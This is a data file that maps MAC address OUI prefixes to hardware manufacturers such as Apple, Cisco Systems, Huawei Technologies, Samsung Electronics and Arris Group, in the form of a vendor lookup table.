Nagravision SA +606405 Texas Instruments +708BCD Asustek Computer +001A21 Brookhuis Applied Technologies BV +00A00E NetScout Systems +1C330E PernixData +345760 MitraStar Technology +343DC4 Buffalo.inc +6CEFC6 Shenzhen Twowing Technologies +002A10 Cisco Systems +44D6E1 Snuza International +0015B9 Samsung Electronics +001DF6 Samsung Electronics +ECE09B Samsung Electronics +606BBD Samsung Electronics +0000F0 Samsung Electronics +4844F7 Samsung Electronics +DC7144 Samsung Electro Mechanics +A00BBA Samsung Electro Mechanics +1C5A3E Samsung Electronics +F47B5E Samsung Electronics +C44619 Hon Hai Precision Ind. +F0F002 Hon Hai Precision Ind. +889FFA Hon Hai Precision Ind. +5CAC4C Hon Hai Precision Ind. +18F46A Hon Hai Precision Ind. +3859F9 Hon Hai Precision Ind. +BC8556 Hon Hai Precision Ind. +9C2A70 Hon Hai Precision Ind. +F82FA8 Hon Hai Precision Ind. +0CEEE6 Hon Hai Precision Ind. +0C6076 Hon Hai Precision Ind. +90FBA6 Hon Hai Precision Ind. +00197D Hon Hai Precision Ind. +001C26 Hon Hai Precision Ind. +9CAD97 Hon Hai Precision Ind. +2C8158 Hon Hai Precision Ind. +142D27 Hon Hai Precision Ind. +843DC6 Cisco Systems +407C7D Nokia +BC52B4 Nokia +FC2FAA Nokia +903AA0 Nokia +702526 Nokia +38F7B2 Seojun Electric +7802B7 ShenZhen Ultra Easy Technology +F81D78 Ieee Registration Authority +88AD43 Pegatron +E4186B ZyXEL Communications +6C71BD Ezelink Telecom +842519 Samsung Electronics +88DEA9 Roku +FC83C6 N-Radio Technologies +B4E782 Vivalnk +008701 Samsung Electronics +FC4203 Samsung Electronics +1C232C Samsung Electronics +08010F Sichuan Tianyi Comheart Telecomco. +CCA260 Sichuan Tianyi Comheart Telecomco. +203CAE Apple +748D08 Apple +00D78F Cisco Systems +A03BE3 Apple +886B0F Bluegiga Technologies OY +98541B Intel Corporate +CC61E5 Motorola Mobility, a Lenovo Company +404E36 HTC +9CB206 Procentec +1C40E8 Shenzhen Progress&win Technology +C8D3FF Hewlett Packard +805EC0 Yealink(xiamen) Network Technology +307496 Huawei Technologies +708A09 Huawei Technologies +149D09 Huawei Technologies +008025 Telit Wireless Solutions GmbH +0001E1 Kinpo Electronics +006041 Yokogawa Digital Computer +14A78B Zhejiang Dahua Technology +D0608C zte +009EC8 Xiaomi Communications +ACF7F3 Xiaomi Communications +102AB3 Xiaomi Communications +584498 Xiaomi Communications +A086C6 Xiaomi Communications +7C1DD9 Xiaomi Communications +C8662C Beijing Haitai Fangyuan High Technology +CC8CDA Shenzhen Wei Da Intelligent Technology Go. +D436DB Jiangsu Toppower Automotive Electronics +64A68F Zhongshan Readboy Electronics +58EF68 Belkin International +003048 Super Micro Computer +001438 Hewlett Packard Enterprise +50D753 Conelcom Gmbh +4C38D5 Mitac Computing Technology +688AF0 zte +000BA1 Fujikura Solutions +AC587B JCT Healthcare +30E171 Hewlett Packard +8C3C4A Nakayo +98CF53 BBK Educational Electronics +F4CB52 Huawei Technologies +446EE5 Huawei Technologies +2C282D BBK Educational Electronics +80414E BBK Educational Electronics +8C7716 Longcheer Telecommunication Limited +000A08 Alpine Electronics +A0143D Parrot SA +00267E Parrot SA +00121C Parrot SA +B85510 Zioncom Electronics (Shenzhen) +000EE8 Zioncom Electronics (Shenzhen) +001165 Znyx Networks +0060D5 Amada Miyachi +000FDB Westell Technologies +D404FF Juniper Networks +C45444 Quanta Computer +00269E Quanta Computer +683563 Shenzhen Liown Electronics +0003B2 Radware +2C600C Quanta Computer +001E68 Quanta Computer +00A09B Qpsx Communications +00E08B QLogic +00080D Toshiba +0015B7 Toshiba +000569 VMware +0008F1 Voltaire +001BDA UTStarcom +FC4DD4 Universal Global Scientific Industrial +402CF4 Universal Global Scientific Industrial +0010C6 Universal Global Scientific Industrial +00247E Universal Global Scientific Industrial +001639 Ubiquam +183919 Unicoi Systems +90A46A Sisnet +14E7C8 Integrated Device Technology (Malaysia) Sdn. Bhd. +280DFC Sony Interactive Entertainment +0015C1 Sony Interactive Entertainment +0019C5 Sony Interactive Entertainment +ACA213 Shenzhen Bilian electronic +38F8CA Owin +54D272 Nuki Home Solutions GmbH +9CA3A9 Guangzhou Juan Optical and Electronical Tech Joint Stock +D02212 Ieee Registration Authority +F80278 Ieee Registration Authority +74E14A Ieee Registration Authority +78CA83 Ieee Registration Authority +D0D94F Ieee Registration Authority +2C265F Ieee Registration Authority +7C70BC Ieee Registration Authority +58FCDB Ieee Registration Authority +B01F81 Ieee Registration Authority +9893CC LG Electronics +3CCD93 LG Electronics +E417D8 8bitdo Technology HK Limited +286C07 Xiaomi Electronics,co. +84D931 Hangzhou H3C Technologies, Limited +44DC91 Planex Communications +9CD332 PLC Technology +94D723 Shanghai DareGlobal Technologies +A89DD2 Shanghai DareGlobal Technologies +184A6F Alcatel-Lucent Shanghai Bell +A0F3E4 Alcatel-Lucent IPD +002105 Alcatel-Lucent IPD +000772 Alcatel-Lucent Shanghai Bell +F06BCA Samsung Electronics +3423BA Samsung Electro-mechanics(thailand) +D022BE Samsung Electro-mechanics(thailand) +D02544 Samsung Electro-mechanics(thailand) +BC20A4 Samsung Electronics +14F42A Samsung Electronics +BC851F Samsung Electronics +B85E7B Samsung Electronics +C462EA Samsung Electronics +0023D6 Samsung Electronics +002491 Samsung Electronics +001B98 Samsung Electronics +44F459 Samsung Electronics +34C3AC Samsung Electronics +94D771 Samsung Electronics +4C3C16 Samsung Electronics +9401C2 Samsung Electronics +B43A28 Samsung Electronics +A8C83A Huawei Technologies +849FB5 Huawei Technologies +D0C1B1 Samsung Electronics +F008F1 Samsung Electronics +782079 ID Tech +98234E Micromedia AG +E80036 Befs +24590B White Sky Limited +10C60C Domino UK +3842A6 Ingenieurbuero Stahlkopf +E866C4 Diamanti +78471D Samsung Electronics +3816D1 Samsung Electronics +004A77 zte +D48890 Samsung Electronics +002566 Samsung Electronics +00265F Samsung Electronics +001628 Magicard +E4C801 BLU Products +00A6CA Cisco Systems +9C7DA3 Huawei Technologies +F02FA7 Huawei Technologies +883FD3 Huawei Technologies +A04E01 Central Engineering +245CBF Ncse +84CD62 Shenzhen Idwell Technology +DC9FDB Ubiquiti Networks +B0958E TP-Link Technologies +001A39 Merten GmbH&CoKG +007B18 Sentry +144D67 Zioncom Electronics (Shenzhen) +34F39A Intel Corporate +20A8B9 Siemens +C81B5C BCTech +3C2AF4 Brother Industries +20719E SF Technology +7C95B1 Aerohive Networks +206C8A Aerohive Networks +E49E12 Freebox SAS +D854A2 Aerohive Networks +E01C41 Aerohive Networks +C8675E Aerohive Networks +D4C8B0 Prime Electronics & Satellitics +000FC2 Uniwell +A4E6B1 Shanghai Joindata Technology +B4B384 ShenZhen Figigantic Electronic +D46A6A Hon Hai Precision Ind. +A8A5E2 MSF-Vathauer Antriebstechnik GmbH & KG +00425A Cisco Systems +000B4F Verifone +007686 Cisco Systems +74FF4C Skyworth Digital Technology(Shenzhen) +A02C36 Fn-link Technology Limited +F8D027 Seiko Epson +44D244 Seiko Epson +9CAED3 Seiko Epson +341E6B Huawei Technologies +B47447 CoreOS +ACC1EE Xiaomi Communications +CCA219 Shenzhen Along Investment +94A04E Bostex Technology +8CA5A1 Oregano Systems - Design & Consulting GmbH +64B0A6 Apple +84FCAC Apple +6C19C0 Apple +20AB37 Apple +186590 Apple +2C0BE9 Cisco Systems +2C6373 Sichuan Tianyi Comheart Telecomco. +9CCC83 Juniper Networks +90505A unGlue +60D262 Tzukuri +34FCB9 Hewlett Packard Enterprise +34049E Ieee Registration Authority +B0E5ED Huawei Technologies +C81451 Huawei Technologies +C486E9 Huawei Technologies +D8C771 Huawei Technologies +F0C850 Huawei Technologies +5425EA Huawei Technologies +2816AD Intel Corporate +50A4D0 Ieee Registration Authority +00A0C8 Adtran +1CB857 Becon Technologies +70918F Weber-Stephen Products +803A0A Integrated Device Technology (Malaysia) Sdn. Bhd. +002207 Inteno Broadband Technology AB +3C7F6F Telechips +0060D3 At&t +800010 At&t +08006A At&t +48A380 Gionee Communication Equipment +5CBA37 Microsoft +C4836F Ciena +C87324 Sow Cheng Technology +3CF862 Intel Corporate +88C3B3 Sovico +54C415 Hangzhou Hikvision Digital Technology +E05124 NXP Semiconductors +005016 Molex Canada +0005F7 Analog Devices +A084CB SonicSensory +7802F8 Xiaomi Communications +00238A Ciena +34E70B HAN Networks +903809 Ericsson AB +542B57 Night Owl SP +00111B Targa Systems Div L-3 Communications +B8224F Sichuan Tianyi Comheart Telecomco. +702084 Hon Hai Precision Ind. +F42B48 Ubiqam +68CC6E Huawei Technologies +00108C Fujitsu Services +98D3D2 Mekra Lang Gmbh & KG +F4DC41 Youngzone Culture (shanghai) +40F385 Ieee Registration Authority +9800C1 Guangzhou Creator Technology,ltd.(china) +3034D2 Availink +CCCE1E AVM Audiovisuelles Marketing und Computersysteme GmbH +501E2D StreamUnlimited Engineering GmbH +40B034 Hewlett Packard +FC0A81 Extreme Networks +C8B5AD Hewlett Packard Enterprise +88E628 Shenzhen Kezhonglong Optoelectronic Technology +9CDA3E Intel Corporate +3CA067 Liteon Technology +D8325A Shenzhen Youhua Technology +44650D Amazon Technologies +50F5DA Amazon Technologies +6854FD Amazon Technologies +40B4CD Amazon Technologies +2C86D2 Cisco Systems +802689 D-Link International +409F38 AzureWave Technology +C4D197 Ventia Utility Services +58821D H. Schomcker GmbH +CCBE59 Calix +EC4F82 Calix +000631 Calix +B8D7AF Murata Manufacturing +3096FB Samsung Electronics +F0EE10 Samsung Electronics +A8A198 TCT mobile +107D1A Dell +C0D012 Apple +D4DCCD Apple +484BAA Apple +F80377 Apple +14BD61 Apple +0827CE Nagano Keiki +00D318 SPG Controls +2C3124 Cisco Systems +F40343 Hewlett Packard Enterprise +00143F Hotway Technology +F8BE0D A2UICT +08EA40 Shenzhen Bilian Electronicltd +00E0DA Alcatel-Lucent Enterprise +5CC6E9 Edifier International +E8C1D7 Philips +1868CB Hangzhou Hikvision Digital Technology +F80BCB Cisco Systems +9CC8AE Becton, Dickinson and Company +B0359F Intel Corporate +24EA40 Helmholz GmbH & KG +84A9C4 Huawei Technologies +A0F479 Huawei Technologies +100501 Pegatron +046E02 OpenRTLS Group +000FF4 Guntermann & Drunck GmbH +70DB98 Cisco Systems +A43D78 Guangdong Oppo Mobile Telecommunications +EC01EE Guangdong Oppo Mobile Telecommunications +B83765 Guangdong Oppo Mobile Telecommunications +4448C1 Hewlett Packard Enterprise +FC539E Shanghai Wind Technologies +9CAF6F Itel Mobile Limited +9C061B Hangzhou H3C Technologies, Limited +907065 Texas Instruments +B8FFB3 MitraStar Technology +A08E78 Sagemcom Broadband SAS +E0D55E Giga-byte Technology +C4576E Samsung Electronics +90F1AA Samsung Electronics +78BDBC Samsung Electronics +20F452 Shanghai IUV Software Development +D47AE2 Samsung Electronics +88D274 zte +986DC8 Toshiba Mitsubishi-electric Industrial Systems +982DBA Fibergate +0040AA Valmet Automation +0080C2 Ieee 802.1 Working Group +68A40E BSH Hausgerte GmbH +847933 profichip GmbH +A0C9A0 Murata Manufacturing +001CC3 Arris Group +641269 Arris Group +287AEE Arris Group +FC51A4 Arris Group +38700C Arris Group +A41588 Arris Group +B81619 Arris Group +B077AC Arris Group +145BD1 Arris Group +6CC1D2 Arris Group +F80BBE Arris Group +DC4517 Arris Group +74F612 Arris Group +74E7C6 Arris Group +0025F2 Arris Group +0015A8 Arris Group +000E5C Arris Group +000CE5 Arris Group +0004BD Arris Group +00E06F Arris Group +386BBB Arris Group +0015CF Arris Group +001DCF Arris Group +001DD5 Arris Group +001DD0 Arris Group +5C571A Arris Group +D82522 Arris Group +70B14E Arris Group +14D4FE Arris Group +002374 Arris Group +002641 Arris Group +0026BA Arris Group +002180 Arris Group +0019C0 Arris Group +0014E8 Arris Group +0019A6 Arris Group +001700 Arris Group +901ACA Arris Group +E8ED05 Arris Group +707630 Arris Group +90C792 Arris Group +789684 Arris Group +CC65AD Arris Group +986B3D Arris Group +5CE30E Arris Group +7823AE Arris Group +447F77 Connected Home +2C7E81 Arris Group +009AD2 Cisco Systems +84C0EF Samsung Electronics +7C1C68 Samsung Electronics +745427 Shenzhen Fast Technologies +F40E83 Arris Group +7C8BCA TP-Link Technologies +F023B9 Ieee Registration Authority +88B111 Intel Corporate +54D751 Proximus +D8F1F0 Pepxim International Limited +0019F0 Unionman Technology +506E92 Innocent Technology +CC4B73 Ampak Technology +900A1A Taicang T&W Electronics +CC03D9 Cisco Meraki +506184 Avaya +F81547 Avaya +A01290 Avaya +B4A95A Avaya +BCADAB Avaya +3C3A73 Avaya +6CB227 Sony Video & Sound Products +60271C Videor E. Hartig Gmbh +C46699 vivo Mobile Communication +FC1A11 vivo Mobile Communication +E0DDC0 vivo Mobile Communication +886AB1 vivo Mobile Communication +18E29F vivo Mobile Communication +0823B2 vivo Mobile Communication +6091F3 vivo Mobile Communication +BC2F3D vivo Mobile Communication +C4ABB2 vivo Mobile Communication +F81D90 Solidwintech +C8DB26 Logitech +4473D6 Logitech +70F35A Cisco Systems +EC42B4 ADC +10CDB6 Essential Products +08306B Palo Alto Networks +4C65A8 Ieee Registration Authority +6CF9D2 Chengdu Goods for the Road Electronic Technology C +3817E1 Technicolor CH USA +641666 Nest Labs +94147A vivo Mobile Communication +74D0DC Ericsson AB +88A3CC Amatis Controls +8C9F3B Qingdao Hisense Communications +404229 Layer3TV +B090D4 Shenzhen Hoin Internet Technology +348F27 Ruckus Wireless +001D2E Ruckus Wireless +689234 Ruckus Wireless +044FAA Ruckus Wireless +0025C4 Ruckus Wireless +38FF36 Ruckus Wireless +2C5D93 Ruckus Wireless +543D37 Ruckus Wireless +C4108A Ruckus Wireless +D463C6 Motorola Mobility, a Lenovo Company +00A050 Cypress Semiconductor +A44CC8 Dell +54666C Shenzhen Youhua Technology +103034 Cara Systems +0840F3 Tenda Technology,Ltd.Dongguan branch +FC8B97 Shenzhen Gongjin Electronics +2CAB25 Shenzhen Gongjin Electronics +AC6E1A Shenzhen Gongjin Electronics +24A534 SynTrust Tech International +F844E3 Taicang T&W Electronics +001F92 Avigilon +887A31 Velankani Electronics Pvt. +8C0F6F Pegatron +283545 Shenzhen Chuangwei-rgb Electronics +0C8FFF Huawei Technologies +54B121 Huawei Technologies +786256 Huawei Technologies +A80C63 Huawei Technologies +5CC307 Huawei Technologies +08A8A1 Cyclotronics Power Concepts +A82BB5 Edgecore Networks +0015FF Novatel Wireless Solutions +788C4D Indyme Solutions +A8B2DA Fujitsu Limited +0CB937 Ubee Interactive, Limited +2880A2 Novatel Wireless Solutions +0CB459 Marketech International +84AA9C MitraStar Technology +0C4B54 TP-Link Technologies +C47154 TP-Link Technologies +44EA4B Actlas +5C6984 Nuvico +F86EEE Huawei Technologies +E4FB5D Huawei Technologies +5C546D Huawei Technologies +508F4C Xiaomi Communications +0027F8 Brocade Communications Systems +50EB1A Brocade Communications Systems +CC4E24 Brocade Communications Systems +889471 Brocade Communications Systems +D81FCC Brocade Communications Systems +002067 Private +0060DF Brocade Communications Systems +000533 Brocade Communications Systems +00223F Netgear +001B2F Netgear +E091F5 Netgear +744401 Netgear +E0469A Netgear +08BD43 Netgear +C40415 Netgear +9CD36D Netgear +20E52A Netgear +4494FC Netgear +008EF2 Netgear +B0B98A Netgear +1100AA Private +1C965A Weifang GoerTek Technology +104E89 Garmin International +30053F JTI +0050B5 Fichet Securite Electronique +04209A Panasonic AVC Networks Company +8CC121 Panasonic AVC Networks Company +20C6EB Panasonic AVC Networks Company +40CE24 Cisco Systems +B0350B Mobiwire Mobiles (ningbo) +28A6AC seca gmbh & kg +00054F Garmin International +E048D3 Mobiwire Mobiles (ningbo) +24C42F Philips Lifeline +B8EE0E Sagemcom Broadband SAS +78886D Apple +A85C2C Apple +00DB70 Apple +386EA2 vivo Mobile Communication +58B42D YSTen Technology +181456 Nokia +E4EC10 Nokia +9C4A7B Nokia +D86162 Wistron Neweb +48EC5B Nokia +0009BC Utility +0016ED Utility +80615F Beijing Sinead Technology +74F661 Schneider Electric Fire & Security Oy +885DFB zte +245FDF Kyocera +608CE6 Arris Group +8CD2E9 Yokote Seiko +186024 Hewlett Packard +706BB9 Cisco Systems +74F91A Onface +6CC147 Xiamen Hanin Electronic Technology +8CFEB4 Vsoontech Electronics, Limited +CCF957 u-blox AG +0076B1 Somfy-Protect By Myfox SAS +74373B Uninet +7C6456 Samsung Electronics +D0666D Shenzhen Bus-Lan Technology +448F17 Samsung Electronics, Artik +B8D94D Sagemcom Broadband SAS +10FCB6 mirusystems +04D6AA Samsung Electro-mechanics(thailand) +08661F Palo Alto Networks +0C5842 DME Micro +A468BC Private +80C755 Panasonic Appliances Company +A0648F Askey Computer +04C1B9 Fiberhome Telecommunication Technologies +D467E7 Fiberhome Telecommunication Technologies +34BF90 Fiberhome Telecommunication Technologies +F8C96C Fiberhome Telecommunication Technologies +48555F Fiberhome Telecommunication Technologies +D4AD2D Fiberhome Telecommunication Technologies +D00492 Fiberhome Telecommunication Technologies +809FAB Fiberhome Telecommunication Technologies +9C88AD Fiberhome Telecommunication Technologies +5CE3B6 Fiberhome Telecommunication Technologies +48F97C Fiberhome Telecommunication Technologies +105887 Fiberhome Telecommunication Technologies +04848A 7inova Technology Limited +E81DA8 Ruckus Wireless +3CC079 Shenzhen One-Nine Intelligent Electronic Science and Technology +746EE4 Asia Vital Components +F44C70 Skyworth Digital Technology(Shenzhen) +D490E0 Topcon Electronics GmbH & KG +9C9C40 Sichuan Tianyi Comheart Telecomco. +98C5DB Ericsson AB +043A0D SM Optics S.r.l. +9CE063 Samsung Electronics +EC7D11 vivo Mobile Communication +18CC88 Hitachi Johnson Controls Air +E8361D Sense Labs +A0950C China Mobile Iotcompany Limited +ECF8EB Sichuan Tianyi Comheart Telecomco. +F06E0B Microsoft +480EEC TP-Link Technologies +5800BB Juniper Networks +801F02 Edimax Technology +000E2E Edimax Technology +701F53 Cisco Systems +1046B4 FormericaOE +80B03D Apple +C83C85 Apple +A04EA7 Apple +409C28 Apple +50C9A0 Skipper AS +F04F7C Private +0CB2B7 Texas Instruments +7C010A Texas Instruments +001530 Dell EMC +08001B Dell EMC +8CCF09 Dell EMC +10A4BE Shenzhen Bilian Electronicltd +E8825B Arris Group +00BE9E Fiberhome Telecommunication Technologies +54C57A Sunnovo International Limited +34E911 vivo Mobile Communication +348584 Aerohive Networks +F8B7E2 Cisco Systems +EC9F0D Ieee Registration Authority +A4B52E Integrated Device Technology (Malaysia) Sdn. Bhd. +C4CD82 Hangzhou Lowan Information Technology +E0AADB Nanjing Paneng Technology Development +E820E2 Humax +64CBA3 Pointmobile +ECF451 Arcadyan +485929 LG Electronics (Mobile Communications) +34FCEF LG Electronics (Mobile Communications) +002483 LG Electronics (Mobile Communications) +001C62 LG Electronics (Mobile Communications) +583F54 LG Electronics (Mobile Communications) +40B0FA LG Electronics (Mobile Communications) +A8922C LG Electronics (Mobile Communications) +98D6F7 LG Electronics (Mobile Communications) +505527 LG Electronics (Mobile Communications) +0034DA LG Electronics (Mobile Communications) +A09169 LG Electronics (Mobile Communications) +C863F1 Sony Interactive Entertainment +88365F LG Electronics (Mobile Communications) +3817C3 Hewlett Packard Enterprise +9C8C6E Samsung Electronics +588A5A Dell +10AE60 Private +2C3996 Sagemcom Broadband SAS +0054BD Swelaser AB +0057D2 Cisco Systems +3C6716 Lily Robotics +806AB0 Shenzhen Tinno Mobile Technology +A0F895 Shenzhen Tinno Mobile Technology +0078CD Ignition Design Labs +28ED6A Apple +34AB37 Apple +60A37D Apple +0056CD Apple +7081EB Apple +086698 Apple +2CFD37 Blue Calypso +0C6127 Actiontec Electronics +001B11 D-Link +001E58 D-Link +002191 D-Link +0022B0 D-Link +F07D68 D-Link +78542E D-Link International +3CDD89 Somo Holdings & TECH. +2C56DC Asustek Computer +B8AF67 Hewlett Packard +188B45 Cisco Systems +B0C090 Chicony Electronics +1CA770 Shenzhen Chuangwei-rgb Electronics +C42F90 Hangzhou Hikvision Digital Technology +A42BB0 TP-Link Technologies +4CE676 Buffalo.inc +B0C745 Buffalo.inc +CCE1D5 Buffalo.inc +B8FC9A Le Shi Zhi Xin Electronic Technology (Tianjin) Limited +2C4138 Hewlett Packard +2C768A Hewlett Packard +0018FE Hewlett Packard +0019BB Hewlett Packard +002264 Hewlett Packard +002481 Hewlett Packard +000D9D Hewlett Packard +0014C2 Hewlett Packard +788B77 Standar Telecom +84ACFB Crouzet Automatismes +34BA75 Tembo Systems +9486CD Seoul Electronics&telecom +94ABDE OMX Technology - FZE +000E35 Intel +00207B Intel +0013CE Intel Corporate +801934 Intel Corporate +B8B81E Intel Corporate +185E0F Intel Corporate +C80E77 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited +843497 Hewlett Packard +ECB1D7 Hewlett Packard +3CA82A Hewlett Packard +480FCF Hewlett Packard +5820B1 Hewlett Packard +2C233A Hewlett Packard +000EB3 Hewlett Packard +0004EA Hewlett Packard +00306E Hewlett Packard +0060B0 Hewlett Packard +24BE05 Hewlett Packard +000423 Intel +0008C7 Hewlett Packard +0010E3 Hewlett Packard +00805F Hewlett Packard +BCEAFA Hewlett Packard +5C8A38 Hewlett Packard +D89D67 Hewlett Packard +2C44FD Hewlett Packard +F0921C Hewlett Packard +B4B52F Hewlett Packard +902155 HTC +64A769 HTC +BCCFCC HTC +B0F1A3 Fengfan (BeiJing) Technology +7C7D3D Huawei Technologies +4482E5 Huawei Technologies +542758 Motorola (Wuhan) Mobility Technologies Communication +4CD08A Humax +20906F Shenzhen Tencent Computer System +1C7839 Shenzhen Tencent Computer System +A4516F Microsoft Mobile Oy +246081 razberi technologies +8CAB8E Shanghai Feixun Communication +9060F1 Apple +EC26CA TP-Link Technologies +2C088C Humax +40F308 Murata Manufacturing +5CDAD4 Murata Manufacturing +000E6D Murata Manufacturing +B05B67 Huawei Technologies +38F889 Huawei Technologies +F4DCF9 Huawei Technologies +904E2B Huawei Technologies +0C96BF Huawei Technologies +9CC172 Huawei Technologies +384608 zte +B4B362 zte +B075D5 zte +08181A zte +002512 zte +B0A37E Qingdao Haier TelecomLtd +70A8E3 Huawei Technologies +F84ABF Huawei Technologies +4CB16C Huawei Technologies +4C1FCC Huawei Technologies +486276 Huawei Technologies +AC4E91 Huawei Technologies +E468A3 Huawei Technologies +80D09B Huawei Technologies +581F28 Huawei Technologies +8C34FD Huawei Technologies +90671C Huawei Technologies +587F66 Huawei Technologies +BC25E0 Huawei Technologies +C4072F Huawei Technologies +0CD6BD Huawei Technologies +A49947 Huawei Technologies +346BD3 Huawei Technologies +1C1D67 Huawei Technologies +84A8E4 Huawei Technologies +202BC1 Huawei Technologies +741BB2 Apple +002586 TP-Link Technologies +F8D111 TP-Link Technologies +F4EC38 TP-Link Technologies +20DCE6 TP-Link Technologies +1C6E4C Logistic Service & Engineering +00101F Cisco Systems +001054 Cisco Systems +DCEB94 Cisco Systems +5C838F Cisco Systems +AC7E8A Cisco Systems +382056 Cisco Systems +28CFE9 Apple +00502A Cisco Systems +005014 Cisco Systems +0090D9 Cisco Systems +009092 Cisco Systems +001029 Cisco Systems +001007 Cisco Systems +00605C Cisco Systems +00E0F7 Cisco Systems +00E0B0 Cisco Systems +00E0FE Cisco Systems +00E0A3 Cisco Systems +00E0F9 Cisco Systems +001BD7 Cisco Spvtg +105172 Huawei Technologies +9017AC Huawei Technologies +94049C Huawei Technologies +5006AB Cisco Systems +0050E2 Cisco Systems +005050 Cisco Systems +009021 Cisco Systems +0090B1 Cisco Systems +00023D Cisco Systems +18E728 Cisco Systems +2C3ECF Cisco Systems +1005CA Cisco Systems +1CDEA7 Cisco Systems +1C6A7A Cisco Systems +CCD8C1 Cisco Systems +7C0ECE Cisco Systems +F09E63 Cisco Systems +F07F06 Cisco Systems +84802D Cisco Systems +E0899D Cisco Systems +A89D21 Cisco Systems +BCF1F2 Cisco Systems +C80084 Cisco Systems +A0F849 Cisco Systems +88908D Cisco Systems +A46C2A Cisco Systems +0021BE Cisco Spvtg +7CB21B Cisco Spvtg +002643 Alps Electric +002433 Alps Electric +745E1C Pioneer +0006F5 Alps Electric +0006F7 Alps Electric +000704 Alps Electric +1C1D86 Cisco Systems +001A92 Asustek Computer +001D60 Asustek Computer +002215 Asustek Computer +20CF30 Asustek Computer +E0CB4E Asustek Computer +1C872C Asustek Computer +C4143C Cisco Systems +2401C7 Cisco Systems +04DAD2 Cisco Systems +F41FC2 Cisco Systems +4C0082 Cisco Systems +DCA5F4 Cisco Systems +7C95F3 Cisco Systems +5017FF Cisco Systems +E8EDF3 Cisco Systems +78DA6E Cisco Systems +24E9B3 Cisco Systems +E425E7 Apple +080007 Apple +000A95 Apple +002241 Apple +0023DF Apple +0025BC Apple +00264A Apple +0026B0 Apple +041E64 Apple +D49A20 Apple +9027E4 Apple +60334B Apple +A43135 Apple +9C35EB Apple +507A55 Apple +A0999B Apple +24240E Apple +903C92 Apple +341298 Apple +9C293F Apple +488AD2 Shenzhen Mercury Communication Technologies +A88E24 Apple +E8802E Apple +68AE20 Apple +E0B52D Apple +80BE05 Apple +D8BB2C Apple +D04F7E Apple +2C1F23 Apple +549F13 Apple +B8098A Apple +F0DBE2 Apple +18EE69 Apple +748114 Apple +18F643 Apple +D0A637 Apple +A01828 Apple +D0034B Apple +5C5948 Apple +78CA39 Apple +18E7F4 Apple +B8FF61 Apple +DC2B61 Apple +1093E9 Apple +442A60 Apple +E0F847 Apple +145A05 Apple +28CFDA Apple +148FC6 Apple +283737 Apple +045453 Apple +F0CBA1 Apple +C06394 Apple +8C006D Apple +B09FBA Apple +DC86D8 Apple +8C2937 Apple +DC9B9C Apple +98F0AB Apple +F0DBF8 Apple +ACCF5C Apple +3C15C2 Apple +04489A Apple +D8CF9C Apple +30F7C5 Apple +008865 Apple +40B395 Apple +3090AB Apple +1CE62B Apple +A0EDCD Apple +A886DD Apple +54EAA8 Apple +E4C63D Apple +843835 Apple +7073CB Apple +9C207B Apple +842999 Apple +74E2F5 Apple +20C9D0 Apple +1402EC Hewlett Packard Enterprise +707938 Wuxi Zhanrui Electronic Technology +646A74 Auth-servers +34C9F0 LM Technologies +E034E4 Feit Electric Company +98E848 Axiim +A0F9E0 Vivatel Company Limited +F8C372 Tsuzuki Denki +908D78 D-Link International +A4CC32 Inficomm +582BDB Pax AB +D00F6D T&W Electronics Company +48BF74 Baicells Technologies +38F557 Jolata +280E8B Beijing Spirit Technology Development +F44D30 Elitegroup Computer Systems +DC9A8E Nanjing Cocomm electronics +C4EF70 Home Skinovations +B813E9 Trace Live Network +746F19 Icarvisions (shenzhen) Technology +7C7176 Wuxi iData Technology Company +7C0191 Apple +70480F Apple +A4B805 Apple +587F57 Apple +80D605 Apple +68A828 Huawei Technologies +988744 Wuxi Hongda Science and Technology +C869CD Apple +BC6C21 Apple +9C8DD3 Leonton Technologies +246C8A Yukai Engineering +A43831 RF elements s.r.o. +D0BAE4 Shanghai Mxchip Information Technology +A4DCBE Huawei Technologies +10CC1B Liverock technologies +48B620 Roli +20D160 Private +382187 Midea Group +305A3A Asustek Computer +A87285 IDT +AC1FD7 Real Vision Technology +C8A2CE Oasis Media Systems +A4DEC9 QLove Mobile Intelligence Information Technology (W.H.) +A4A6A9 Private +0469F8 Apple +9C7A03 Ciena +380AAB Formlabs +F41535 Spon Communication Technology +E41A2C ZPE Systems +A815D6 Shenzhen Meione Technology +D09380 Ducere Technologies Pvt. +84A788 Perples +6889C1 Huawei Technologies +845B12 Huawei Technologies +143EBF zte +041E7A Dspworks +38B725 Wistron Infocomm (Zhongshan) +4CC681 Shenzhen Aisat Electronic +28B9D9 Radisys +E0553D Cisco Meraki +0894EF Wistron Infocomm (Zhongshan) +E0319E Valve +E4A32F Shanghai Artimen Technology +D47BB0 Askey Computer +5045F7 Liuhe Intelligence Technology +20F510 Codex Digital Limited +949F3E Sonos +788E33 Jiangsu Seuic Technology +E01AEA Allied Telesis +340CED Moduel AB +507B9D Lcfc(hefei) Electronics Technology +6C7220 D-Link International +F02624 Wafa Technologies +F8F464 Rawe Electonic GmbH +F4672D ShenZhen Topstar Technology Company +382B78 ECO Plugs Enterprise +BCEB5F Fujian Beifeng Telecom Technology +800B51 Chengdu XGimi Technology +00FC8D Hitron Technologies. +1CC586 Absolute Acoustics +E076D0 Ampak Technology +24B0A9 Shanghai Mobiletek Communication +64167F Polycom +54E2C8 Dongguan Aoyuan Electronics Technology +20D75A Posh Mobile Limited +88D37B FirmTek +10AF78 Shenzhen Atue Technology +B0966C Lanbowan Technology +A408EA Murata Manufacturing +D4F9A1 Huawei Technologies +9CB6D0 Rivet Networks +D0C0BF Actions Microelectronics +E04B45 Hi-P Electronics Pte +6C4598 Antex Electronic +94A7B7 zte +3C8375 Microsoft +C8458F Wyler AG +149A10 Microsoft +FC9AFA Motus Global +5CB43E Huawei Technologies +FCE1FB Array Networks +54E140 Ingenico +14157C Tokyo Cosmos Electric +408D5C Giga-byte Technology +6CE01E Modcam AB +E8F2E3 Starcor Beijing,Limited +D048F3 Dattus +CC19A8 PT Inovao e Sistemas SA +6C4418 Zappware +44962B Aidon Oy +D4D7A9 Shanghai Kaixiang Info Tech +185D9A BobjGear +884157 Shenzhen Atsmart Technology +3CDA2A zte +747336 Microdigtal +0CE725 Microsoft +6C2E72 B&B Exporting Limited +FC3288 Celot Wireless +BCB308 Hongkong Ragentek Communication Technology,limited +445ECD Razer +749637 Todaair Electronic +2031EB Hdsn +C0335E Microsoft +ACCAAB Virtual Electric +241B44 Hangzhou Tuners Electronics +90C35F Nanjing Jiahao Technology +18F145 NetComm Wireless Limited +4CA515 Baikal Electronics JSC +9CE230 Julong +34873D Quectel Wireless Solution +186882 Beward R&D +344CA4 amazipoint 